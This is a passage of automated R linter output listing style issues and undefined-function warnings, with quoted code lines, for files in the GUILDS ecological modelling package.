indent, never tabs.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n^\n```\n[R/drawLocal.R:54:17:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n               ~^~\n```\n[R/drawLocal.R:54:34:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n                                ~^~~\n```\n[R/drawLocal.R:55:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L55) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(esk)\n^\n```\n[R/drawLocal.R:61:5:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L61) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(length(idx0) > 0) {\n    ^\n```\n[R/drawLocal.R:62:42:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L62) *style:* **Put spaces around all infix operators.**\n```r\n​    aux <- log(th) + lgamma(I) - lgamma(I+j) +\n                                        ~^~\n```\n[R/drawLocal.R:69:9:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L69) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n        ^\n```\n[R/drawLocal.R:69:11:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n         ~^~\n```\n[R/drawLocal.R:69:14:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n            ~^~~\n```\n[R/drawLocal.R:69:16:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L69) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n               ^\n```\n[R/drawLocal.R:69:17:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L69) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n                ^\n```\n[R/drawLocal.R:71:27:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L71) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                          ^\n```\n[R/drawLocal.R:71:28:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L71) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                           ^\n```\n[R/drawLocal.R:71:31:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                             ~^~~\n```\n[R/drawLocal.R:71:37:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                                    ^~~\n```\n[R/drawLocal.R:73:27:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L73) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                          ^\n```\n[R/drawLocal.R:73:28:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L73) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                           ^\n```\n[R/drawLocal.R:73:31:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L73) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                             ~^~~\n```\n[R/drawLocal.R:73:37:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L73) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                                   ~^~~\n```\n[R/drawLocal.R:77:17:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L77) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  idxp <- which((x > 0) & (x < 1))\n                ^\n```\n[R/drawLocal.R:79:29:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​  aux <- log(th) + lgamma(I)-lgamma(I + j) +\n                           ~^~\n```\n[R/drawLocal.R:83:13:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​         (th-1) * log(1 - xx) - log(xx)\n           ~^~\n```\n[R/drawLocal.R:90:9:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L90) *warning:* **no visible global function definition for ‘getpx’, Did you mean 'get'?**\n```r\n​  nx <- getpx(theta, alpha_x, alpha_y, JX, JY)\n        ^~~~~\n```\n[R/drawLocal.R:94:27:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L94) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:95:27:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L95) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:97:11:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L97) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx <- pm_sad(theta, I_X, JX)\n          ^~~~~~\n```\n[R/drawLocal.R:98:11:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L98) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady <- pm_sad(theta, I_Y, JY)\n          ^~~~~~\n```\n[R/drawLocal.R:110:68:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L110) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J - 1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                   ^\n```\n[R/drawLocal.R:112:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L112) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/drawLocal.R:117:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L117) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/drawLocal.R:119:3:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L119) *style:* **Variable and function names should be all lowercase.**\n```r\n​  allN <- 0:J\n  ^~~~\n```\n[R/drawLocal.R:121:12:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L121) *warning:* **no visible global function definition for ‘polyaeggenberger’**\n```r\n​  probs <- polyaeggenberger(I_X, I_Y, J, allN)\n           ^~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:121:42:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L121) *style:* **Variable and function names should be all lowercase.**\n```r\n​  probs <- polyaeggenberger(I_X, I_Y, J, allN)\n                                         ^~~~\n```\n[R/drawLocal.R:126:11:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L126) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx <- pm_sad(theta, I_X, NX)\n          ^~~~~~\n```\n[R/drawLocal.R:127:11:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L127) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady <- pm_sad(theta, I_Y, NY)\n          ^~~~~~\n```\n[R/ESF_function.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/ESF_function.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.ESF <- function(theta, m, abund) {\n^~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:10:14:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/ESF_function.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​  I <- m * (J-1) / (1 - m)\n            ~^~\n```\n[R/ESF_function.R:12:10:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/ESF_function.R#L12) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:12:10:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/ESF_function.R#L12) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:14:13:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/ESF_function.R#L14) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)\n            ^~~~~~~~~~~~\n```\n[R/ESF_function.R:19:22:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/ESF_function.R#L19) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  prefactor1 <- -1 * ( sum(log(abund)) + sum(lgamma(1 + freq_x)))\n                     ^\n```\n[R/ESF_function.R:22:22:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/ESF_function.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​  factor1 <- lgamma(J+1) + prefactor1\n                    ~^~\n```\n[R/ESF_function.R:24:15:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/ESF_function.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​  factor2 <- S*log(theta)   -  (lgamma(I + J) - lgamma(I))\n             ~^~\n```\n[R/ESF_function.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/ESF_function.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n^\n```\n[R/ESF_function.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/ESF_function.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\treturn(out)\n^~\n```\n[R/ESF_function.R:44:13:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/ESF_function.R#L44) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)\n            ^~~~~~~~~~~~\n```\n[R/ESF_function.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/ESF_function.R#L52) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.ESF <- function(init_vals, abund, verbose=TRUE) {\n^~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:70:10:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/ESF_function.R#L70) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:70:10:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/ESF_function.R#L70) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:76:24:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/ESF_function.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​  prefactor <- lgamma(J+1) - ( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                      ~^~\n```\n[R/ESF_function.R:79:15:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/ESF_function.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n             ~^~~\n```\n[R/ESF_function.R:79:16:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/ESF_function.R#L79) *warning:* **no visible global function definition for ‘esf_local’**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n               ^~~~~~~~~\n```\n[R/ESF_function.R:79:21:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/ESF_function.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n                   ~^~\n```\n[R/ESF_function.R:83:14:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/ESF_function.R#L83) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​  optimum <- simplex(init_vals, g, verbose)\n             ^~~~~~~\n```\n[R/evaluateLogLik2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/evaluateLogLik2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateLogLik <- function(v, theta_x, theta_y, alpha_x, alpha_y,\n^~~~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:17:8:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/evaluateLogLik2.R#L17) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n       ^\n```\n[R/evaluateLogLik2.R:17:42:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/evaluateLogLik2.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                         ^\n```\n[R/evaluateLogLik2.R:19:8:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/evaluateLogLik2.R#L19) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  s <- calc_sum_kda(Sx, Nx, I_X, (theta_x / 2), KDA_X)\n       ^~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:20:8:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/evaluateLogLik2.R#L20) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  z <- calc_sum_kda(Sy, Ny, I_Y, (theta_y / 2), KDA_Y)\n       ^~~~~~~~~~~~\n```\n[R/expected.R:2:19:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L2) *style:* **Commas should always have a space after.**\n```r\n​  output <- rep(0,13)\n                  ^\n```\n[R/expected.R:5:15:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​    start <- 2^(k - 1)\n             ~^~\n```\n[R/expected.R:5:16:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L5) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    start <- 2^(k - 1)\n               ^\n```\n[R/expected.R:6:18:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​    end <- -1 + 2^(k)\n                ~^~\n```\n[R/expected.R:6:19:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L6) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    end <- -1 + 2^(k)\n                  ^\n```\n[R/expected.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n^~\n```\n[R/expected.R:7:7:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L7) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(end > length(A)) {\n      ^\n```\n[R/expected.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n^~\n```\n[R/expected.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n^~~\n```\n[R/expected.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n^~\n```\n[R/expected.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n^~\n```\n[R/expected.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n^~~\n```\n[R/expected.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n^~\n```\n[R/expected.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n^~~\n```\n[R/expected.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n^~\n```\n[R/expected.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n^~~\n```\n[R/expected.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:38:10:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L38) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  aux <- pm_sad(theta, I, J)\n         ^~~~~~\n```\n[R/expected.R:39:10:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L39) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  sad <- sort_aux(aux)\n         ^~~~~~~~\n```\n[R/expected.R:43:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L43) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​expected.SAD.Guilds <- function(theta, alpha_x, alpha_y,\n^~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:49:8:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L49) *warning:* **no visible global function definition for ‘draw_local’**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n       ^~~~~~~~~~\n```\n[R/expected.R:49:19:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n                 ~^~~\n```\n[R/expected.R:50:21:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L50) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                    ^\n```\n[R/expected.R:50:39:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L50) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                                      ^~~~~~\n```\n[R/expected.R:51:34:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                ~^~~\n```\n[R/expected.R:51:50:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L51) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                                 ^~~~~~\n```\n[R/expected.R:53:21:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                    ^\n```\n[R/expected.R:53:39:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L53) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                                      ^~~~~~\n```\n[R/expected.R:54:34:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                ~^~~\n```\n[R/expected.R:54:50:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L54) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                                 ^~~~~~\n```\n[R/expected.R:60:9:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L60) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  gx <- sort_aux(meanx)\n        ^~~~~~~~\n```\n[R/expected.R:61:9:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L61) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  gy <- sort_aux(meany)\n        ^~~~~~~~\n```\n[R/expected.R:62:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/expected.R:67:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L67) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​expected.SAD.Guilds.Conditional <- function(theta,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:67:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L67) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​expected.SAD.Guilds.Conditional <- function(theta,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:73:18:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L73) *style:* **Commas should always have a space after.**\n```r\n​  meanx <- rep(0,Jx)\n                 ^\n```\n[R/expected.R:74:18:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L74) *style:* **Commas should always have a space after.**\n```r\n​  meany <- rep(0,Jy)\n                 ^\n```\n[R/expected.R:77:8:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L77) *warning:* **no visible global function definition for ‘draw_local_cond’**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n       ^~~~~~~~~~~~~~~\n```\n[R/expected.R:77:19:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n                 ~^~~\n```\n[R/expected.R:78:21:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L78) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                    ^\n```\n[R/expected.R:78:39:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L78) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                                      ^~~~~~\n```\n[R/expected.R:79:34:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                ~^~~\n```\n[R/expected.R:79:50:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L79) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                                 ^~~~~~\n```\n[R/expected.R:81:21:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L81) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                    